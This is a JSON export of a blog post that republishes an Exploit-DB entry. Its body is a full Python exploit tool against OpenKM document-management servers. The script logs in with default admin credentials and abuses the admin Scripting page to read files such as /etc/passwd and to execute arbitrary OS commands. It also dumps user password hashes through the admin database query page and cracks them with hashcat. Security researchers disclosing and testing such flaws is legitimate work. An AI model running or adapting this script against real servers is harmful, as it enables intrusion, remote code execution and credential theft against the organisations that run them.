{"id":50100,"date":"2026-04-29T04:40:44","date_gmt":"2026-04-29T04:40:44","guid":{"rendered":"http:\/\/localhost\/?p=50100"},"modified":"2026-04-29T04:40:44","modified_gmt":"2026-04-29T04:40:44","slug":"openkm-6312-multiple","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=50100","title":{"rendered":"OpenKM 6.3.12 – Multiple_EDB-ID:52520"},"content":{"rendered":"

{“lastseen”:”2026-04-29T09:27:57″,”description”:”Exploit Title: OpenKM Multiple Critical Zero-Day Date: 17 Jan 2026 Exploit Author: Terra System Labs Pvt. Ltd. Vendor Homepage: https:\/\/www.openkm.com\/ Software Link: https:\/\/hub.docker.com\/r\/openkm\/openkm-ce Version: OpenKM Community Edition 6.3.12…”,”published”:”2026-04-29T00:00:00″,”modified”:”2026-04-29T00:00:00″,”type”:”exploitdb”,”title”:”OpenKM 6.3.12 – Multiple”,”source”:””,”references”:””,”id”:”EDB-ID:52520″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”# Exploit Title: OpenKM Multiple Critical Zero-Day\\r\\n# Date: 17 Jan 2026\\r\\n# Exploit Author: Terra System Labs Pvt. Ltd.\\r\\n# Vendor Homepage: https:\/\/www.openkm.com\/\\r\\n# Software Link: https:\/\/hub.docker.com\/r\/openkm\/openkm-ce\\r\\n# Version: OpenKM Community Edition 6.3.12 and OpenKM Pro Edition 7.1.47 and previous versions\\r\\n# Tested on: Windows and Linux Docker\\r\\n# CVE : N\/A\\r\\n\\r\\nimport requests\\r\\nimport argparse\\r\\nimport os\\r\\nimport subprocess\\r\\nfrom importlib import import_module\\r\\nimport re\\r\\nimport signal\\r\\nimport sys\\r\\nimport getpass\\r\\n\\r\\nprint(\\”Research Conducted By: Terra System Labs Research Team\\”)\\r\\nprint(\\”Read Full Article: https:\/\/terrasystemlabs.com\/post?slug=openkm-zero-day-vulnerabilities-terra-system-labs\\”)\\r\\n\\r\\n# Ensure all required libraries are installed and re-import missing ones\\r\\ndef check_and_install_libraries():\\r\\n required_libraries = [\\”requests\\”, \\”bs4\\”, \\”prettytable\\”, \\”termcolor\\”]\\r\\n for lib in required_libraries:\\r\\n try:\\r\\n import_module(lib)\\r\\n except ImportError:\\r\\n print(f\\”Library {lib} not found. Installing…\\”)\\r\\n subprocess.check_call([\\r\\n sys.executable, \\”-m\\”, \\”pip\\”, \\”install\\”, lib, \\”–break-system-packages\\”\\r\\n])\\r\\n print(f\\”Library {lib} installed successfully.\\”)\\r\\n\\r\\ncheck_and_install_libraries()\\r\\n\\r\\nfrom bs4 import BeautifulSoup\\r\\nfrom prettytable import PrettyTable\\r\\n\\r\\ntry:\\r\\n from termcolor import colored\\r\\n use_colored_output = True\\r\\nexcept ImportError:\\r\\n use_colored_output = False\\r\\n\\r\\n# Utility function for colored output\\r\\ndef print_colored(message, color):\\r\\n if use_colored_output:\\r\\n print(colored(message, color))\\r\\n else:\\r\\n print(message)\\r\\n\\r\\n# Global session to persist cookies and authentication\\r\\nsession = requests.Session()\\r\\n\\r\\ndef signal_handler(sig, frame):\\r\\n print_colored(\\”\\\\nDetected CTRL+C. Logging out…\\”, \\”red\\”)\\r\\n if \\”base_url\\” in globals():\\r\\n logout(base_url, proxies, verify_ssl)\\r\\n sys.exit(0)\\r\\n\\r\\nsignal.signal(signal.SIGINT, signal_handler)\\r\\n\\r\\n\\r\\n\\r\\ndef check_version(base_url, proxies, verify_ssl):\\r\\n print_colored(\\”Checking OpenKM version…\\”, \\”cyan\\”)\\r\\n version_url = f\\”{base_url}\/frontend\/Workspace\\”\\r\\n headers = {\\r\\n \\”User-Agent\\”: \\”Mozilla\/5.0\\”,\\r\\n \\”Accept\\”: \\”*\/*\\”,\\r\\n \\”Content-Type\\”: \\”text\/x-gwt-rpc; charset=utf-8\\”,\\r\\n \\”X-GWT-Permutation\\”: \\”57C4A26D31617E3BF3460E4771D72FCC\\”,\\r\\n \\”X-GWT-Module-Base\\”: f\\”{base_url}\/frontend\/\\”,\\r\\n \\”Origin\\”: base_url,\\r\\n \\”Referer\\”: f\\”{base_url}\/frontend\/index.jsp\\”,\\r\\n }\\r\\n\\r\\n payload = (\\r\\n f\\”7|0|4|{base_url}\/frontend\/|42DC97C6A4E30E734F8CCD1FE2250214|\\”\\r\\n \\”com.openkm.frontend.client.service.OKMWorkspaceService|getUserWorkspace|1|2|3|4|0|\\”\\r\\n )\\r\\n\\r\\n response = session.post(version_url, headers=headers, data=payload, proxies=proxies, verify=verify_ssl)\\r\\n\\r\\n if response.status_code == 200 and response.text.startswith(\\”\/\/OK\\”):\\r\\n try:\\r\\n strings = re.findall(r’\\”([^\\”]+)\\”‘, response.text)\\r\\n idx = strings.index(\\”com.openkm.frontend.client.bean.GWTAppVersion\/1901889346\\”)\\r\\n build = strings[idx + 1]\\r\\n release_type = strings[idx + 2]\\r\\n ver_major = strings[idx + 3]\\r\\n ver_minor = strings[idx + 4]\\r\\n ver_patch = strings[idx + 5]\\r\\n print_colored(f\\”OpenKM Version: {ver_minor}.{ver_patch}.{ver_major} (build: {build}, type: {release_type})\\”, \\”green\\”)\\r\\n except Exception as e:\\r\\n print_colored(f\\”Failed to parse version: {e}\\”, \\”red\\”)\\r\\n else:\\r\\n print_colored(\\”Failed to fetch version information.\\”, \\”red\\”)\\r\\n\\r\\n\\r\\n\\r\\n# Function to handle login\\r\\ndef login(base_url, username, password):\\r\\n login_url = f\\”{base_url}\/login.jsp\\”\\r\\n login_payload = {\\r\\n \\”j_username\\”: username,\\r\\n \\”j_password\\”: password,\\r\\n \\”j_language\\”: \\”en-GB\\”,\\r\\n \\”submit\\”: \\”\\”\\r\\n }\\r\\n login_post_url = f\\”{base_url}\/j_spring_security_check\\”\\r\\n response = session.post(login_post_url, data=login_payload, proxies=proxies, verify=verify_ssl)\\r\\n if \\”error\\” in response.url:\\r\\n print_colored(\\”Login failed. Check credentials.\\”, \\”red\\”)\\r\\n return False\\r\\n print_colored(\\”Login successful using default credentials or provided oen, if any.\\”, \\”green\\”)\\r\\n check_version(base_url, proxies, verify_ssl)\\r\\n return True\\r\\n\\r\\n\\r\\n# Function for Local File Inclusion (LFI)\\r\\ndef lfi(base_url, read_file, proxies, verify_ssl):\\r\\n csrf_page_url = f\\”{base_url}\/admin\/Scripting\\”\\r\\n csrf_response = session.get(csrf_page_url, proxies=proxies, verify=verify_ssl)\\r\\n csrf_token = None\\r\\n if csrf_response.status_code == 200:\\r\\n soup = BeautifulSoup(csrf_response.text, \\”html.parser\\”)\\r\\n csrf_input = soup.find(\\”input\\”, {\\”name\\”: \\”csrft\\”})\\r\\n if csrf_input:\\r\\n csrf_token = csrf_input[\\”value\\”]\\r\\n if not csrf_token:\\r\\n print_colored(\\”Failed to fetch CSRF token.\\”, \\”red\\”)\\r\\n return\\r\\n\\r\\n script_payload = {\\r\\n \\”csrft\\”: csrf_token,\\r\\n \\”script\\”: \\”\\”,\\r\\n \\”fsPath\\”: read_file,\\r\\n \\”action\\”: \\”Load\\”\\r\\n }\\r\\n script_post_url = f\\”{base_url}\/admin\/Scripting\\”\\r\\n response = session.post(script_post_url, data=script_payload, proxies=proxies, verify=verify_ssl)\\r\\n if response.status_code == 200:\\r\\n soup = BeautifulSoup(response.text, \\”html.parser\\”)\\r\\n textarea = soup.find(\\”textarea\\”, {\\”id\\”: \\”script\\”})\\r\\n if textarea:\\r\\n print_colored(\\”LFI Successful. Extracted Content:\\”, \\”green\\”)\\r\\n print(textarea.text.strip())\\r\\n else:\\r\\n print_colored(\\”Content not found.\\”, \\”red\\”)\\r\\n else:\\r\\n print_colored(\\”LFI exploit failed.\\”, \\”red\\”)\\r\\n\\r\\n# Function for Remote Code Execution (RCE)\\r\\ndef rce(base_url, command, proxies, verify_ssl):\\r\\n csrf_page_url = f\\”{base_url}\/admin\/Scripting\\”\\r\\n csrf_response = session.get(csrf_page_url, proxies=proxies, verify=verify_ssl)\\r\\n csrf_token = None\\r\\n if csrf_response.status_code == 200:\\r\\n soup = BeautifulSoup(csrf_response.text, \\”html.parser\\”)\\r\\n csrf_input = soup.find(\\”input\\”, {\\”name\\”: \\”csrft\\”})\\r\\n if csrf_input:\\r\\n csrf_token = csrf_input[\\”value\\”]\\r\\n if not csrf_token:\\r\\n print_colored(\\”Failed to fetch CSRF token.\\”, \\”red\\”)\\r\\n return\\r\\n\\r\\n exploit_payload = f\\”\\”\\”\\r\\n try {{\\r\\n Process process = Runtime.getRuntime().exec(\\”{command}\\”);\\r\\n BufferedReader reader = new BufferedReader(new InputStreamReader(process.getInputStream()));\\r\\n String output = reader.readLine();\\r\\n print(\\”Result: \\” + output);\\r\\n }} catch (IOException e) {{\\r\\n print(\\”Error: \\” + e.getMessage());\\r\\n }}\\r\\n \\”\\”\\”\\r\\n script_payload = {\\r\\n \\”csrft\\”: csrf_token,\\r\\n \\”script\\”: exploit_payload,\\r\\n \\”fsPath\\”: \\”\\”,\\r\\n \\”action\\”: \\”Evaluate\\”\\r\\n }\\r\\n script_post_url = f\\”{base_url}\/admin\/Scripting\\”\\r\\n response = session.post(script_post_url, data=script_payload, proxies=proxies, verify=verify_ssl)\\r\\n if response.status_code == 200:\\r\\n match = re.search(r\\”Result:\\\\s*(\\\\w+)\\”, response.text)\\r\\n if match:\\r\\n print_colored(\\”RCE Successful. Result:\\”, \\”green\\”)\\r\\n print(match.group(1))\\r\\n else:\\r\\n print_colored(\\”RCE failed to return a result.\\”, \\”red\\”)\\r\\n\\r\\n#Function for crack hash\\r\\ndef crack_password():\\r\\n# Extract hashes from hashes.txt and save to md5_hashes.txt\\r\\n def extract_hashes_to_file():\\r\\n try:\\r\\n with open(\\”hashes.txt\\”, \\”r\\”) as file:\\r\\n hashes_data = file.readlines()\\r\\n # Extract only the hashes (after the colon)\\r\\n hashes_only = [line.split(\\”:\\”)[1].strip() for line in hashes_data]\\r\\n # Write the hashes to md5_hashes.txt\\r\\n with open(\\”md5_hashes.txt\\”, \\”w\\”) as file:\\r\\n file.write(\\”\\\\n\\”.join(hashes_only))\\r\\n print(\\”Hashes successfully extracted to md5_hashes.txt\\”)\\r\\n except FileNotFoundError:\\r\\n print(\\”Error: hashes.txt file not found. Please ensure the file exists in the current directory.\\”)\\r\\n\\r\\n # Combine usernames with cracked passwords\\r\\n def combine_passwords():\\r\\n try:\\r\\n # Load usernames and hashes from hashes.txt\\r\\n with open(\\”hashes.txt\\”, \\”r\\”) as file:\\r\\n hashes_data = file.readlines()\\r\\n \\r\\n # Load cracked hashes and passwords from cracked_hashes.txt\\r\\n with open(\\”cracked_hashes.txt\\”, \\”r\\”) as file:\\r\\n cracked_data = file.readlines()\\r\\n \\r\\n # Parse data into dictionaries\\r\\n hashes_dict = {line.split(\\”:\\”)[0]: line.split(\\”:\\”)[1].strip() for line in hashes_data}\\r\\n cracked_dict = {line.split(\\”:\\”)[0]: line.split(\\”:\\”)[1].strip() for line in cracked_data}\\r\\n \\r\\n # Match and combine data into final_cracked.txt\\r\\n final_cracked = [\\”Username:Passwords\\\\n\\”] # Add header\\r\\n for username, hash_value in hashes_dict.items():\\r\\n if hash_value in cracked_dict:\\r\\n password = cracked_dict[hash_value]\\r\\n final_cracked.append(f\\”{username}:{password}\\\\n\\”)\\r\\n \\r\\n # Save the results to final_cracked.txt\\r\\n final_cracked_path = os.path.abspath(\\”final_cracked.txt\\”)\\r\\n with open(final_cracked_path, \\”w\\”) as file:\\r\\n file.writelines(final_cracked)\\r\\n print_colored(\\”Final cracked usernames and passwords saved to final_cracked.txt\\”, \\”green\\”)\\r\\n\\r\\n # Confirm with the user before displaying passwords\\r\\n show_passwords = input(\\”Do you want to display the cracked passwords (default N) Y\/N: \\”).strip().lower()\\r\\n if show_passwords == ‘y’:\\r\\n print(\\”{:\\u003c20} {:\\u003c20}\\”.format(\\”Username\\”, \\”Password\\”))\\r\\n print(\\”-\\” * 40)\\r\\n for line in final_cracked[1:]: # Skip header\\r\\n username, password = line.strip().split(\\”:\\”)\\r\\n print(\\”{:\\u003c20} {:\\u003c20}\\”.format(username, password))\\r\\n exit(0)\\r\\n else:\\r\\n print(\\”Passwords are hidden as per your choice. Read the Saved file to display the passwords in plaintext\\”)\\r\\n\\r\\n except FileNotFoundError:\\r\\n print(\\”Error: Ensure both hashes.txt and cracked_hashes.txt are present in the current directory.\\”)\\r\\n\\r\\n # Main script\\r\\n if __name__ == \\”__main__\\”:\\r\\n # Step 1: Extract hashes to md5_hashes.txt\\r\\n extract_hashes_to_file()\\r\\n\\r\\n # Step 2: Prompt user for the wordlist path and use default if not provided\\r\\n wordlist_path = input(\\”Enter the path to your wordlist (Press Enter to use default: \/usr\/share\/wordlists\/rockyou.txt): \\”).strip()\\r\\n if not wordlist_path:\\r\\n wordlist_path = \\”\/usr\/share\/wordlists\/rockyou.txt\\”\\r\\n\\r\\n import os\\r\\n # Run hashcat commands\\r\\n print(\\”Running hashcat…\\”)\\r\\n os.system(f\\”hashcat -m 0 -a 0 md5_hashes.txt {wordlist_path} –quiet\\”)\\r\\n os.system(f\\”hashcat -m 0 -a 0 md5_hashes.txt {wordlist_path} –show \\u003e cracked_hashes.txt\\”)\\r\\n\\r\\n # Step 3: Combine usernames with cracked passwords\\r\\n combine_passwords()\\r\\n\\r\\n\\r\\n\\r\\n# Function for SQL Injection (SQLi)\\r\\ndef sqli(base_url, proxies, verify_ssl):\\r\\n print_colored(\\”Running Unrestricted SQL Query…\\”, \\”magenta\\”)\\r\\n query_url = f\\”{base_url}\/admin\/DatabaseQuery\\”\\r\\n multipart_form_data = (\\r\\n \\”—————————–88617175833200583821560840739\\\\r\\\\n\\”\\r\\n \\”Content-Disposition: form-data; name=\\\\\\”qs\\\\\\”\\\\r\\\\n\\\\r\\\\n\\”\\r\\n \\”SELECT * FROM OKM_USER;\\\\r\\\\n\\”\\r\\n \\”—————————–88617175833200583821560840739\\\\r\\\\n\\”\\r\\n \\”Content-Disposition: form-data; name=\\\\\\”tables\\\\\\”\\\\r\\\\n\\\\r\\\\n\\”\\r\\n \\”OKM_USER\\\\r\\\\n\\”\\r\\n \\”—————————–88617175833200583821560840739\\\\r\\\\n\\”\\r\\n \\”Content-Disposition: form-data; name=\\\\\\”vtables\\\\\\”\\\\r\\\\n\\\\r\\\\n\\\\r\\\\n\\”\\r\\n \\”—————————–88617175833200583821560840739\\\\r\\\\n\\”\\r\\n \\”Content-Disposition: form-data; name=\\\\\\”type\\\\\\”\\\\r\\\\n\\\\r\\\\n\\”\\r\\n \\”jdbc\\\\r\\\\n\\”\\r\\n \\”—————————–88617175833200583821560840739–\\”\\r\\n )\\r\\n headers = {\\r\\n \\”Content-Type\\”: \\”multipart\/form-data; boundary=—————————88617175833200583821560840739\\”,\\r\\n }\\r\\n response = session.post(query_url, data=multipart_form_data, headers=headers, proxies=proxies, verify=verify_ssl)\\r\\n if response.status_code == 200:\\r\\n soup = BeautifulSoup(response.text, ‘html.parser’)\\r\\n table = soup.find(‘table’, class_=’results-old’)\\r\\n if table:\\r\\n print_colored(\\”SQL Injection Successful. Results:\\”, \\”green\\”)\\r\\n rows = table.find_all(‘tr’)\\r\\n table_data = PrettyTable()\\r\\n headers = [header.text.strip() for header in rows[0].find_all(‘th’)]\\r\\n table_data.field_names = headers\\r\\n with open(\\”hashes.txt\\”, \\”w\\”) as file:\\r\\n for row in rows[1:]:\\r\\n columns = row.find_all([‘td’, ‘th’])\\r\\n # Ensure all columns are filled, replacing missing values with ‘N\/A’ and matching headers\\r\\n row_data = [col.text.strip() if col.text.strip() else ‘N\/A’ for col in columns[:len(headers)]]\\r\\n if len(row_data) == len(headers):\\r\\n table_data.add_row(row_data)\\r\\n # Write USR_ID and USR_PASSWORD to the file\\r\\n usr_id = row_data[headers.index(\\”USR_ID\\”)]\\r\\n usr_password = row_data[headers.index(\\”USR_PASSWORD\\”)]\\r\\n file.write(f\\”{usr_id}:{usr_password}\\\\n\\”)\\r\\n\\r\\n print(table_data)\\r\\n #current_directory = os.getcwd()\\r\\n print_colored(\\”hashes.txt created in the current directory\\”, \\”green\\”)\\r\\n\\r\\n crack_hash = input(\\”Do you want to crack user’s password in plain text (default N) Y\/N: \\”).strip()\\r\\n if crack_hash in [‘y’, ‘Y’]:\\r\\n crack_password()\\r\\n else:\\r\\n print(\\”Skipping password cracking…\\”)\\r\\n exit()\\r\\n\\r\\n else:\\r\\n print_colored(\\”No results found.\\”, \\”red\\”)\\r\\n else:\\r\\n print_colored(\\”SQL Injection failed.\\”, \\”red\\”)\\r\\n\\r\\n# Function for logout\\r\\ndef logout(base_url, proxies, verify_ssl):\\r\\n print_colored(\\”Logging out…\\”, \\”green\\”)\\r\\n logout_url = f\\”{base_url}\/frontend\/Auth\\”\\r\\n headers = {\\r\\n \\”User-Agent\\”: \\”Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko\/20100101 Firefox\/134.0\\”,\\r\\n \\”Accept\\”: \\”*\/*\\”,\\r\\n \\”Accept-Language\\”: \\”en-US,en;q=0.5\\”,\\r\\n \\”Accept-Encoding\\”: \\”gzip, deflate, br\\”,\\r\\n \\”Content-Type\\”: \\”text\/x-gwt-rpc; charset=utf-8\\”,\\r\\n \\”X-GWT-Permutation\\”: \\”57C4A26D31617E3BF3460E4771D72FCC\\”,\\r\\n \\”X-GWT-Module-Base\\”: f\\”{base_url}\/frontend\/\\”,\\r\\n \\”Origin\\”: base_url\\r\\n }\\r\\n logout_payload = \\”7|0|4|http:\/\/\\”+base_url+\\”\/OpenKM\/frontend\/|62DBFE1B3CAA52AD46EA20F866574A5F|com.openkm.frontend.client.service.OKMAuthService|logout|1|2|3|4|0|\\”\\r\\n response = session.post(logout_url, headers=headers, data=logout_payload, proxies=proxies, verify=verify_ssl)\\r\\n if response.status_code == 200 and \\”\/\/OK\\” in response.text:\\r\\n print_colored(\\”Logged out successfully.\\”, \\”green\\”)\\r\\n else:\\r\\n print_colored(\\”Logout failed.\\”, \\”red\\”)\\r\\n\\r\\n# Main function\\r\\ndef main():\\r\\n global base_url, proxies, verify_ssl\\r\\n\\r\\n parser = argparse.ArgumentParser(description=\\”Unified Vulnerability Testing Tool\\”)\\r\\n parser.add_argument(\\”–url\\”, required=True, help=\\”Base URL of the target application\\”)\\r\\n parser.add_argument(\\”–run\\”, help=\\”Run specific tests: (A=All, L=LFI, R=RCE, S=SQL)\\”)\\r\\n parser.add_argument(\\”–proxy\\”, help=\\”Proxy URL in the format http:\/\/IP:PORT\\”)\\r\\n parser.add_argument(\\”–login\\”, help=\\”Credentials in the format username:password\\”)\\r\\n args = parser.parse_args()\\r\\n\\r\\n help1 = args.run\\r\\n if help1 in [\\”-h\\”, \\”–help\\”]:\\r\\n print_colored(\\”Run python3 openkm-scanner.py –url http:\/\/host:port\\”)\\r\\n\\r\\n base_url = args.url[:-1] if args.url.endswith(‘\/’) else args.url\\r\\n if not base_url.endswith(\\”\/OpenKM\\”):\\r\\n base_url += \\”\/OpenKM\\”\\r\\n\\r\\n proxies = {\\”http\\”: args.proxy, \\”https\\”: args.proxy} if args.proxy else None\\r\\n verify_ssl = False\\r\\n \\r\\n if args.login:\\r\\n try:\\r\\n username, password = args.login.split(\\”:\\”, 1)\\r\\n except ValueError:\\r\\n print_colored(\\”Invalid format for –login. Use username:password\\”, \\”red\\”)\\r\\n return\\r\\n else:\\r\\n username = \\”okmAdmin\\”\\r\\n password = \\”admin\\”\\r\\n if not login(base_url, username, password):\\r\\n return\\r\\n\\r\\n\\r\\n # if args.login:\\r\\n # print(\\”Username Received\\”, login)\\r\\n # try:\\r\\n # username, password = args.login.split(\\”:\\”, 1)\\r\\n # except ValueError:\\r\\n # print_colored(\\”Invalid format for –login. Use username:password\\”, \\”red\\”)\\r\\n # return\\r\\n # else:\\r\\n # username = \\”okmAdmin\\”\\r\\n # password = \\”admin\\”\\r\\n # if not login(base_url, username, password):\\r\\n # return\\r\\n\\r\\n run_tests = args.run\\r\\n if not run_tests:\\r\\n run_tests = input(\\”Enter tests to run (A=All, L=LFI, R=RCE, S=SQL): \\”).upper()\\r\\n\\r\\n if run_tests in [‘A’, ‘a’]:\\r\\n print_colored(\\”Running LFI attack…\\”, \\”magenta\\”)\\r\\n read_file = input(\\”Enter file path for LFI (default: \/etc\/passwd): \\”) or \\”\/etc\/passwd\\”\\r\\n lfi(base_url, read_file, proxies, verify_ssl)\\r\\n print_colored(\\”Running RCE attack…\\”, \\”magenta\\”)\\r\\n command = input(\\”Enter command for RCE (default: whoami): \\”) or \\”whoami\\”\\r\\n rce(base_url, command, proxies, verify_ssl)\\r\\n sqli(base_url, proxies, verify_ssl)\\r\\n crack_password()\\r\\n exit()\\r\\n\\r\\n if run_tests in [‘L’, ‘l’]:\\r\\n print_colored(\\”Running LFI attack…\\”, \\”magenta\\”)\\r\\n read_file = input(\\”Enter file path for LFI (default: \/etc\/passwd): \\”) or \\”\/etc\/passwd\\”\\r\\n lfi(base_url, read_file, proxies, verify_ssl)\\r\\n\\r\\n if run_tests in [‘R’, ‘r’]:\\r\\n print_colored(\\”Running RCE attack…\\”, \\”magenta\\”)\\r\\n command = input(\\”Enter command for RCE (default: whoami): \\”) or \\”whoami\\”\\r\\n rce(base_url, command, proxies, verify_ssl)\\r\\n\\r\\n if run_tests in [‘S’, ‘s’]:\\r\\n sqli(base_url, proxies, verify_ssl)\\r\\n\\r\\nif __name__ == \\”__main__\\”:\\r\\n main()”,”sourceHref”:”https:\/\/www.exploit-db.com\/raw\/52520″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.exploit-db.com\/exploits\/52520″,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-04-29T09:27:57″,”description”:”Exploit Title: OpenKM Multiple Critical Zero-Day Date: 17 Jan 2026 Exploit Author: Terra System Labs Pvt. Ltd. Vendor Homepage: https:\/\/www.openkm.com\/ Software Link: https:\/\/hub.docker.com\/r\/openkm\/openkm-ce Version: OpenKM…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,40,13,33,7,11,5],"class_list":["post-50100","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-exploitdb","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\nOpenKM 6.3.12 - Multiple_EDB-ID:52520 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=50100\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"OpenKM 6.3.12 - Multiple_EDB-ID:52520 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-04-29T09:27:57″,”description”:”Exploit Title: OpenKM Multiple Critical Zero-Day Date: 17 Jan 2026 Exploit Author: Terra System Labs Pvt. Ltd. Vendor Homepage: https:\/\/www.openkm.com\/ Software Link: https:\/\/hub.docker.com\/r\/openkm\/openkm-ce Version: OpenKM...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=50100\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-04-29T04:40:44+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"15 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50100#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50100\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"OpenKM 6.3.12 – Multiple_EDB-ID:52520\",\"datePublished\":\"2026-04-29T04:40:44+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50100\"},\"wordCount\":3063,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"exploitdb\",\"news\",\"NONE\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=50100#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50100\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50100\",\"name\":\"OpenKM 6.3.12 - Multiple_EDB-ID:52520 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-04-29T04:40:44+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50100#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=50100\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50100#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"OpenKM 6.3.12 – Multiple_EDB-ID:52520\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"OpenKM 6.3.12 - Multiple_EDB-ID:52520 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=50100","og_locale":"en_US","og_type":"article","og_title":"OpenKM 6.3.12 - Multiple_EDB-ID:52520 - zero redgem","og_description":"{“lastseen”:”2026-04-29T09:27:57″,”description”:”Exploit Title: OpenKM Multiple Critical Zero-Day Date: 17 Jan 2026 Exploit Author: Terra System 